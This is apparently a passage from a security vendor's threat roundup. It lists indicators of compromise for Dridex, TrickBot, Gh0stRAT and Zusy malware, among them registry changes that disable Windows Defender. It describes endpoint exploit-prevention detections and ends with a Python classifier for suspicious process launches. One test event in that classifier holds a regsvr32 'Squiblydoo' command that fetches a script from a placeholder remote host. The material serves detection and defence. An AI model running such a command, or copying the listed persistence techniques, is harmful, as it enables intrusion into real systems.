microsoft[.]com 300
lazystax[.]ru 300
249[.]5[.]55[.]69[.]in-addr[.]arpa 299
microsoft-com[.]mail[.]protection[.]outlook[.]com 299
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 213
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 212
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 212
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 212
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 212
www[.]google[.]com 209
mta7[.]am0[.]yahoodns[.]net 194
mta6[.]am0[.]yahoodns[.]net 187
mta5[.]am0[.]yahoodns[.]net 186
mx2[.]hotmail[.]com 173
mx3[.]hotmail[.]com 165
mx4[.]hotmail[.]com 162
mx1[.]hotmail[.]com 161
authserver[.]mojang[.]com 89
alt2[.]gmail-smtp-in[.]l[.]google[.]com 88
alt1[.]gmail-smtp-in[.]l[.]google[.]com 81
www[.]instagram[.]com 80
gmail-smtp-in[.]l[.]google[.]com 79
alt4[.]gmail-smtp-in[.]l[.]google[.]com 79
whois[.]iana[.]org 78
whois[.]arin[.]net 76

*See JSON for more IOCs

Files and or directories created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 299
%SystemRoot%\SysWOW64\config\systemprofile:.repos 299
%TEMP%\<random, matching '[a-z]{8}'>.exe 281
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 62
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 40
%SystemRoot%\SysWOW64\fymsrzfu 19
%SystemRoot%\SysWOW64\rkyedlrg 18
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 18
%SystemRoot%\SysWOW64\lesyxfla 16
%SystemRoot%\SysWOW64\buionvbq 15
%SystemRoot%\SysWOW64\piwcbjpe 14
%SystemRoot%\SysWOW64\unbhgouj 14
%SystemRoot%\SysWOW64\yrflksyn 14
%SystemRoot%\SysWOW64\xqekjrxm 13
%SystemRoot%\SysWOW64\cvjpowcr 13
%SystemRoot%\SysWOW64\dwkqpxds 13
%SystemRoot%\SysWOW64\nguazhnc 13
%SystemRoot%\SysWOW64\qjxdckqf 11
%SystemRoot%\SysWOW64\athnmuap 11
%SystemRoot%\SysWOW64\ibpvucix 11
%SystemRoot%\SysWOW64\kdrxwekz 11
%SystemRoot%\SysWOW64\haoutbhw 11
%SystemRoot%\SysWOW64\jcqwvdjy 11
%SystemRoot%\SysWOW64\tmagfnti 10
%TEMP%\llkqbpwz.exe 5

*See JSON for more IOCs

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9882835-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
21
Mutexes | Occurrences
<random, matching [A-Z0-9]{10}> 21
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
142[.]250[.]72[.]110 20
104[.]23[.]98[.]190 11
104[.]23[.]99[.]190 10
209[.]85[.]144[.]100/31 7
23[.]3[.]13[.]88 3
8[.]253[.]132[.]120/31 3
209[.]85[.]144[.]138/31 3
23[.]3[.]13[.]154 2
209[.]85[.]144[.]113 2
172[.]217[.]12[.]238 1
8[.]253[.]131[.]120 1
8[.]253[.]45[.]214 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
pastebin[.]com 21
w[.]google[.]com 21
www3[.]l[.]google[.]com 12
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 5
www[.]3uvexiaty7[.]com 1
www[.]domnz7vvnb[.]com 1
www[.]ve8ou79uye[.]com 1
www[.]xghhacdq0w[.]com 1
www[.]chqh6mv3sb[.]com 1
www[.]tvszhrwjoe[.]com 1
www[.]dunngvjplt[.]com 1
www[.]xmvxawrtqw[.]com 1
www[.]ezgk3dsdcj[.]com 1
www[.]da5hxzevov[.]com 1
www[.]agnkbjftop[.]com 1
www[.]myi2gu7xf1[.]com 1
www[.]4bgue0iyon[.]com 1
www[.]gbxewhyjj3[.]com 1
www[.]q3cbd5fxkt[.]com 1
www[.]a7hgyy5um9[.]com 1
www[.]pubpioxdsn[.]com 1
www[.]fbhyhbahbl[.]com 1
www[.]ictmfkicjt[.]com 1
www[.]whlzqsc1pr[.]com 1
www[.]f4zsmgym4n[.]com 1

*See JSON for more IOCs

Files and or directories created | Occurrences
<malware cwd>\old_<malware exe name> (copy) 21
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 1

File Hashes
Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.TrickBot-9882885-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 41 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER
Value Name: DisableAntiSpyware
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: DeleteFlag
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableBehaviorMonitoring
26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableOnAccessProtection
26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableOnRealtimeEnable
26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableIOAVProtection
26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER 26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION 26
Mutexes | Occurrences
Global\316D1C7871E10 26
Global\551AB680DA010 1
Global\9A0C978E5E3932960 1
Global\D870604C8131128 1
Global\7EBA1BA86EA10 1
Global\1B255F507D410 1
Global\8935F1F8C7E10 1
Global\08776A26A89932960 1
Global\6ED45B7A6DE932832 1
Global\31E23F4EFD3932960 1
Global\FF7252924A4932832 1
Global\90833FACFEB1128 1
Global\18F38E8E3A3932960 1
Global\CA2F252894A10 1
Global\62A27AD0EB410 1
Global\9192F476D1D932960 1
Global\4A39609A826932832 1
Global\B5C24E9E3A7932960 1
Global\4CA57236C8D932960 1
Global\AE1D8E4E393932960 1
Global\7D4C23448D11128 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
72[.]22[.]185[.]208 14
72[.]22[.]185[.]200 12
200[.]122[.]209[.]78 2
181[.]209[.]88[.]26 2
193[.]0[.]178[.]20 2
85[.]209[.]162[.]216/31 2
51[.]38[.]101[.]194 1
201[.]184[.]69[.]50 1
51[.]77[.]92[.]215 1
80[.]173[.]224[.]81 1
85[.]143[.]219[.]128 1
173[.]247[.]238[.]184 1
200[.]54[.]14[.]61 1
181[.]129[.]136[.]226 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
crl[.]microsoft[.]com 26
Files and or directories created | Occurrences
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 26
%ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5 26
%System32%\Tasks\Ms nocsys tools 26
%APPDATA%\nocsys 26
%APPDATA%\nocsys\data 26
%APPDATA%\NOCSYS\<original file name>.exe 26
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1160359183-2529320614-3255788068-500\a18ca4003deb042bbee7a40f15e1970b_24e2b309-1719-4436-b195-573e7cb0f5b1 20
%ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\396de868fa3d0eba3f5795cb816e1bfd_24e2b309-1719-4436-b195-573e7cb0f5b1 20
%APPDATA%\nocsys\settings.ini 20
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt 17
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp 17
%System32%\Microsoft\Protect\S-1-5-18\User\d023035f-3867-4126-9856-b88eb9a40592 12
%System32%\Microsoft\Protect\S-1-5-18\User\a5e679cf-af20-480c-a0f2-3963fe5675cc 7
%System32%\Microsoft\Protect\S-1-5-18\User\9591d337-3013-42e2-b0fa-2b12dfad32af 2
%System32%\Microsoft\Protect\S-1-5-18\User\6d307590-6983-4c3e-9384-847ea5ded675 2
%System32%\Microsoft\Protect\S-1-5-18\User\a14115dc-1d88-41cc-a6ae-38c59745a977 1
%System32%\Microsoft\Protect\S-1-5-18\User\ed05a357-d1a3-479c-87c4-d96ade21ea7b 1
%System32%\Microsoft\Protect\S-1-5-18\User\64c5cd5b-a5ba-4a94-8081-f82e182251b0 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Gh0stRAT-9882928-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: Description
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: ErrorControl
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: DisplayName
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: WOW64
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: ObjectName
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: FailureActions
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: MakeTime
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: ImagePath
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: Type
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: Start
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: ErrorControl
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: DisplayName
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: WOW64
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: ObjectName
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: FailureActions
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: Description
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: MakeTime
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: ImagePath
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSTUVWX ABC 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSTUVWX ABC
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSTUVWX ABC
Value Name: Start
1
Mutexes | Occurrences
f'Ìð-q’?ÈWö°Ãîg¾Ým^ÂÅe$½{HÀ9Snó–Qt¸G½ 15
f'Ìð-q’?ÈWö°Ãîg¾Ým^ÂÌn3¤`WÙ"Jyú†A 9
r: ×®p,œyˆR 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
205[.]209[.]171[.]248 24
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
zxl520[.]f3322[.]org 24
new[.]lmshusheng[.]com 1
Files and/or directories created | Occurrences
%ProgramData%\Microsoft\Orhig 8
%ProgramData%\Microsoft\Qyqku 6
%ProgramData%\Microsoft\Orhig\mrbtbz.exe 4
%ProgramData%\Microsoft\Orhig\wbflvv.exe 4
%ProgramData%\Microsoft\Sfzmi 4
%ProgramData%\Microsoft\Umiow 4
%ProgramData%\Microsoft\Qyqku\ewqcyk.exe 3
%ProgramData%\Microsoft\Qyqku\ummkeo.exe 3
%ProgramData%\Microsoft\Mkygs 3
%ProgramData%\Microsoft\Aaaaa\aaaaaa.exe 2
%ProgramData%\Microsoft\Wmiwy\kkesuw.exe 2
%ProgramData%\Microsoft\Mkygs\ewqcyk.exe 2
%ProgramData%\Microsoft\Sfzmi\oguusg.exe 2
%ProgramData%\Microsoft\Sfzmi\mrbtbz.exe 2
%ProgramData%\Microsoft\Umiow\ummkeo.exe 2
%ProgramData%\Microsoft\Umiow\wbflvv.exe 2
%ProgramData%\Microsoft\Sldsw\uhvxbf.exe 2
%ProgramData%\Microsoft\Kjtks\obdhpx.exe 1
%ProgramData%\Microsoft\Syqsw\uuikos.exe 1
%ProgramData%\Microsoft\Ytrym\sfpjxl.exe 1
%ProgramData%\Microsoft\Ipxie\gtfdzv.exe 1
%ProgramData%\Microsoft\Ygeym\sscwky.exe 1
%ProgramData%\Microsoft\Cuwco\iiyeqc.exe 1
%ProgramData%\Microsoft\Usmuk\ccgoeu.exe 1
%ProgramData%\Microsoft\Kwgks\ooquck.exe 1

*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Zusy-9883232-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\59FA93603156820ACCEA8EEB6C50D2CD4D77AFE5 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\07C9D3483399ED27657D99C1FC9F5EE6415411E1 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\FA14A75C398DCCEDECEB8DB8C6F147F94399265E 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\59FA93603156820ACCEA8EEB6C50D2CD4D77AFE5
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\2E429959A7C7DA3127D0E12225F164252FA7CCF1 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\BAC11E013ABD0662AC2C7A7B8F649346B806B53D 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\FF97AD2341FE7688EBF9874877F8E6008DDFB93A 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\33BB27004D9105200E7E9485A76609D2C0F7CCBA 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\07C9D3483399ED27657D99C1FC9F5EE6415411E1
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\CFE6DDB9DAD1EFBCE181DDC5206A02799959A2A0 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\FA14A75C398DCCEDECEB8DB8C6F147F94399265E
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\2E429959A7C7DA3127D0E12225F164252FA7CCF1
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\5954078DB0BE70F645D8ACBE8B5DA42D5363345E 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\BAC11E013ABD0662AC2C7A7B8F649346B806B53D
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\33BB27004D9105200E7E9485A76609D2C0F7CCBA
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\62A76DC1A8F49DDE280188C3213AF6DA0BA1DCBC 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\7FB7DE141ED1DF2FCF214B582AEDC7E3AE0D6CF5 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\FF97AD2341FE7688EBF9874877F8E6008DDFB93A
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\98BD02E20E9060688F4E963E9439E3068211B7FF 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\2F6A61576E8383EEF4059A24110508E5CA5C2A4A 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\6420E7C397E284422DD77BA9EC03363ABBB4873A 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\D4C0BF29BECE91F5C8194C5F2AFA462E220FD42E 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\CFE6DDB9DAD1EFBCE181DDC5206A02799959A2A0
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\5954078DB0BE70F645D8ACBE8B5DA42D5363345E
Value Name: Blob
1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\62A76DC1A8F49DDE280188C3213AF6DA0BA1DCBC
Value Name: Blob
1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
142[.]11[.]206[.]50 25
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
1[.]1[.]168[.]192[.]in-addr[.]arpa 23
localhost 23
1[.]0[.]168[.]192[.]in-addr[.]arpa 17
Files and/or directories created | Occurrences
%ProgramData%\Vhxwcgzi.tmp 24
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 24
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cert8.db 23
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\key3.db 23
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js 23
\TEMP\tmp.edb 23
%System32%\LogFiles\Scm\26f915b8-d0da-45d2-b432-bc32eb0c50a3 23
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\prefs.js 17
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\cert9.db 17
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\key4.db 17
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cert9.db-journal 17
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\key4.db-journal 17
%ProgramFiles(x86)%\Vhxwcgzi.tmp 17
%TEMP%\3785372676.tmp 1
%TEMP%\3785400788.tmp 1
%TEMP%\tmp722E.tmp.ps1 1
%TEMP%\tmp8687.tmp.ps1 1
%TEMP%\3785369587.tmp 1
%TEMP%\tmpDE57.tmp.ps1 1
%TEMP%\tmp92F5.tmp.ps1 1
%TEMP%\tmp1253.tmp.ps1 1
%TEMP%\tmp7EDB.tmp.ps1 1
%TEMP%\tmp9823.tmp.ps1 1
%TEMP%\tmpE9C.tmp.ps1 1
%TEMP%\tmpFCEE.tmp.ps1 1

*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (13807)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
A Microsoft Office process has started a Windows utility. - (11065)
A process associated with Microsoft Office, such as EXCEL.exe, OUTLOOK.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Excessively long PowerShell command detected - (3208)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Reverse TCP payload detected - (3033)
An exploit payload intended to connect back to an attacker-controlled host using TCP has been detected.
CVE-2020-1472 exploit detected - (1991)
An attempt to exploit CVE-2020-1472, also known as "Zerologon", has been detected. This is a privilege escalation vulnerability in Netlogon.
Cobalt Strike activity detected - (1437)
Cobalt Strike is a tool used by both penetration testers and malicious actors. It has been observed being used to deliver Ryuk ransomware and other payloads.
Crystalbit-Apple DLL double hijack detected - (1328)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Dealply adware detected - (1201)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Maze ransomware detected - (691)
Maze ransomware has been detected injecting into rundll32.exe or regsvr32.exe. Maze can encrypt files on the victim and demand a ransom. It can also exfiltrate data back to the attacker prior to encryption.
Squiblydoo application control bypass attempt detected. - (668)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
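As an added example (not Talos or AMP code), the following Python classifier applies three of the behavioral heuristics described above (Office spawning a Windows utility, an excessively long PowerShell command line, and regsvr32.exe pointed at a remote script) to constructed process-creation events. The event field names, the length threshold, and the sample command lines are assumptions for illustration.

```python
import re

# Constructed process-creation events, loosely shaped like Sysmon Event ID 1
# fields (parent image, image, command line). These are not real telemetry;
# the host name is a placeholder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -Command " + "A" * 900},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /u /i:http://example.invalid/x.sct"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Office parents and Windows utilities named in the text above.
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
WINDOWS_UTILS = {"powershell.exe", "cmd.exe", "regsvr32.exe"}
# Assumed threshold; the cutoff AMP actually uses is not published here.
LONG_POWERSHELL_THRESHOLD = 500


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the heuristics an event matches (possibly none)."""
    hits = []
    parent, image = basename(event["parent"]), basename(event["image"])
    cmdline = event["cmdline"]
    if parent in OFFICE_APPS and image in WINDOWS_UTILS:
        hits.append("office_spawned_windows_utility")
    if "powershell" in cmdline.lower() and len(cmdline) > LONG_POWERSHELL_THRESHOLD:
        hits.append("excessively_long_powershell_command")
    if image == "regsvr32.exe" and re.search(r"/i:\s*https?://", cmdline, re.IGNORECASE):
        hits.append("squiblydoo_regsvr32_remote_script")
    return hits


def scan(events):
    """Index and matched heuristics for every event that triggers at least one."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```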